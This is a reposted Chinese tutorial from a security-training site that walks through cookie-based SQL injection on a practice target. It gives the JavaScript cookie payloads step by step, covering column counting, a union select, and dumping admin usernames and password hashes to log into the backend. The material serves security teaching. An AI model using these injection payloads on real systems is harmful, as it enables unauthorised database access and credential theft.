安基网 首页 安全 攻防案例 查看内容

再一次重现sql注入,黑客技法详解

2019-11-29 09:10| 投稿: xiaotiger |来自: 互联网


免责声明:本站系公益性非盈利IT技术普及网,本文由投稿者转载自互联网的公开文章,文末均已注明出处,其内容和图片版权归原网站或作者所有,文中所述不代表本站观点,若有无意侵权或转载不当之处请从网站右下角联系我们处理,谢谢合作!

摘要: 经过了我们前段时间的sql注入学习,今天我们来深入学习一下sql注入之cookie注入首先我们打开靶场环境随便点开一篇文章尝试在结尾构造一下 and 1=1可见是使用了防注入的,但是目前我们是使用get方式提交的参数,我们将id=171包括后面的全部删除一下试试显示数据库出错这里存在cookie注入,首先我们恢复成 ...

经过了我们前段时间的sql注入学习,今天我们来深入学习一下sql注入之cookie注入

首先我们打开靶场环境

随便点开一篇文章

尝试在结尾构造一下 and 1=1

可见是使用了防注入的,但是目前我们是使用get方式提交的参数,我们将id=171包括后面的全部删除一下试试

显示数据库出错

这里存在cookie注入,首先我们恢复成原来的界面

然后我们下载一个ModHeader浏览器插件,将cookie设置为id的值。然后我们访问

其去掉后面?id的网页,发现并没有显示数据库出错了

然后将IE栏清空,输入

javascript:alert(document.cookie="id="+escape("171"));

这个语句就是构造一个JS,把内容插入到cookie里面去

返回出一个id=171

然后我们来手工注入一下他的字段数

javascript:alert(document.cookie="id="+escape("171 order by 10"));

可以知道他有10个字段数

然后我们里显示他的值

javascript:alert(document.cookie="id="+escape("171 union select 1,2,3,4,5,6,7,8,9,10 from admin"));

再刷新一遍发现显示2,3

然后我们来破解账号和密码

javascript:alert(document.cookie="id="+escape("171 union select 1,password,username,4,5,6,7,8,9,10 from admin"));

得出来MD5加密后密码,解密后welcome,然后就可以登录后台了。

最后喜欢我文章的朋友请加圈子关注我们,私信关键词:加群。(送免费资料和优惠券)

就会自动分享给你群号。欢迎大家加入我们的安全大家庭。提高大家的安全意识,提升大家的网络安全技能一直是我们的初衷和愿景,让我们共同成为守护信息世界的"SaFeMAN"。

还有可以关注我们微信公众号,在公众号上输入安界网,就可以关注到我们,领取资料和优惠券!



小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里 注册账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪!

本文出自:https://www.toutiao.com/a6764245983858524680/

免责声明:本站系公益性非盈利IT技术普及网,本文由投稿者转载自互联网的公开文章,文末均已注明出处,其内容和图片版权归原网站或作者所有,文中所述不代表本站观点,若有无意侵权或转载不当之处请从网站右下角联系我们处理,谢谢合作!


鲜花

握手

雷人

路过

鸡蛋

相关阅读

最新评论

 最新
返回顶部